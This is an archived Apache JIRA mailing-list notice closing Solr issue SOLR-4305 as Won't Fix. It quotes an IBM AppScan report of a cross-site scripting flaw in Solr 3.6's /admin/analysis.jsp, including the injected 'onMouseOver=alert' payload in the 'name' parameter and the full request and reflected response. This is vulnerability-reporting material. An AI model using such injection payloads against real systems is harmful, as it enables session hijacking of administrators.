[jira] [Closed] (SOLR-4305) XSS vulnerability in Solr /admin/analysis.jsp

Mon, 19 Sep 2016 07:05:13 -0700 

     [ 
https://issues.apache.org/jira/browse/SOLR-4305?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jan Høydahl closed SOLR-4305.
-----------------------------
    Resolution: Won't Fix

Closing as won't fix as we do not have JSPs anymore :)

> XSS vulnerability in Solr /admin/analysis.jsp
> ---------------------------------------------
>
>                 Key: SOLR-4305
>                 URL: https://issues.apache.org/jira/browse/SOLR-4305
>             Project: Solr
>          Issue Type: Bug
>          Components: multicore
>    Affects Versions: 3.6
>         Environment: Solaris
>            Reporter: Rob Brooks
>              Labels: security
>
> This issue was found when running solr 3.6 in solaris, in a multicore setup. 
> Each core had a cross site scripting vulnerability found at 
> /admin/analysis.jsp while testing using IBM Rational AppScan 8.5.0.1.
> Here are the details of the scan result as given by IBM Rational AppScan:
> [1 of 1] Cross-Site Scripting
> Severity: High
> Test Type: Application
> Vulnerable URL: https://<server>/solr/<core>/admin/analysis.jsp (Parameter: 
> name)
> CVE ID(s): N/A
> CWE ID(s): 79 (parent of 83)
> Remediation Tasks: Review possible solutions for hazardous character injection
> Variant 1 of 6 [ID=19389]
> The following changes were applied to the original request:
> • Set parameter 'name's value to '" onMouseOver=alert(39846)//'
> Request/Response:
> 12/10/2012 3:33:04 PM 16/187
> POST /solr/<core>/admin/analysis.jsp HTTP/1.1
> Cookie: JSESSIONID=0D77846A894B8BB086394C396F19D0E9
> Content-Length: 96
> Accept: */*
> Accept-Language: en-us
> User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64;
> Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 
> 3.0.30729;
> Media Center PC 6.0; Tablet PC 2.0)
> Host: <server>:8443
> Content-Type: application/x-www-form-urlencoded
> Referer: https://<server>/solr/<core>/admin/analysis.jsp?highlight=on
> nt=type&name=" onMouseOver=alert
> (39846)//&verbose=on&highlight=on&val=1234&qverbose=on&qval=1234
> HTTP/1.1 200 OK
> Content-Length: 1852
> Server: Apache-Coyote/1.1
> Content-Type: text/html;charset=utf-8
> Date: Mon, 10 Dec 2012 15:54:38 GMT
> <html>
> <head>
> <script>
> var host_name="<server>"
> </script>
> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
> <link rel="stylesheet" type="text/css" href="solr-admin.css">
> <link rel="icon" href="favicon.ico" type="image/ico"></link>
> <link rel="shortcut icon" href="favicon.ico" type="image/ico"></link>
> <title>Solr admin page</title>
> </head>
> <body>
> <a href="."><img border="0" align="right" height="78" width="142"
> src="solr_small.png" alt="Solr"></a>
> <h1>Solr Admin (Cares)
> </h1>
> <server><br/>
> cwd=/export/home/kh SolrHome=/solr/<core>/
> <br/>
> 12/10/2012 3:33:04 PM 17/187
> HTTP caching is ON
> <br clear="all">
> <h2>Field Analysis</h2>
> <form method="POST" action="analysis.jsp" accept-charset="UTF-8">
> <table>
> <tr>
> <td>
> <strong>Field
> <select name="nt">
> <option >name</option>
> <option selected="selected">type</option>
> </select></strong>
> </td>
> <td>
> <input class="std" name="name" type="text" value="" 
> onMouseOver=alert(39846)//">
> </td>
> </tr>
> <tr>
> <td>
> <strong>Field value (Index)</strong>
> <br/>
> verbose output
> <input name="verbose" type="checkbox"
> checked="true" >
> <br/>
> highlight matches
> <input name="highlight" type="checkbox"
> checked="true" >
> </td>
> <td>
> <textarea class="std" rows="8" cols="70" name="val">1234</textarea>
> </td>
> </tr>
> <tr>
> <td>
> <strong>Field value (Query)</strong>
> <br/>
> verbose output
> <input name="qverbose" type="checkbox"
> checked="true" >
> </td>
> <td>
> <textarea class="std" rows="1" cols="70" name="qval">1234</textarea>
> </td>
> </tr>
> <tr>
> <td>
> </td>
> <td>
> <input class="stdbutton" type="submit" value="analyze">
> </td>
> </tr>
> </table>
> </form>
> <strong>Unknown Field Type: " onMouseOver=alert(39846)//</strong>
> </body>
> </html>
> 12/10/2012 3:33:04 PM 18/187
> Validation In Response:
> • option>
> <option selected="selected">type</option>
> </select></strong>
> </td>
> <td>
> <input class="std" name="name" type="text" value="" onMouseOver=alert
> (39846)//">
> </td>
> </tr>
> <tr>
> <td>
> <strong>Field value (Index)</strong>
> <br/>
> verbose output
> <inp
> Reasoning:
> The test successfully embedded a script in the response, which will be 
> executed once the user
> activates the OnMouseOver function (i.e., hovers with the mouse cursor over 
> the vulnerable
> control). This means that the application is vulnerable to Cross-Site 
> Scripting attacks.
> CWE ID:
> 83 (child of 79)
> Vulnerable URL: https://<server>/solr/<core>/admin/threaddump.jsp
> Total of 1 security issues in this URL



--
This message was sent by Atlassian JIRA
(v6.3.4#6332)

---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

Reply via email to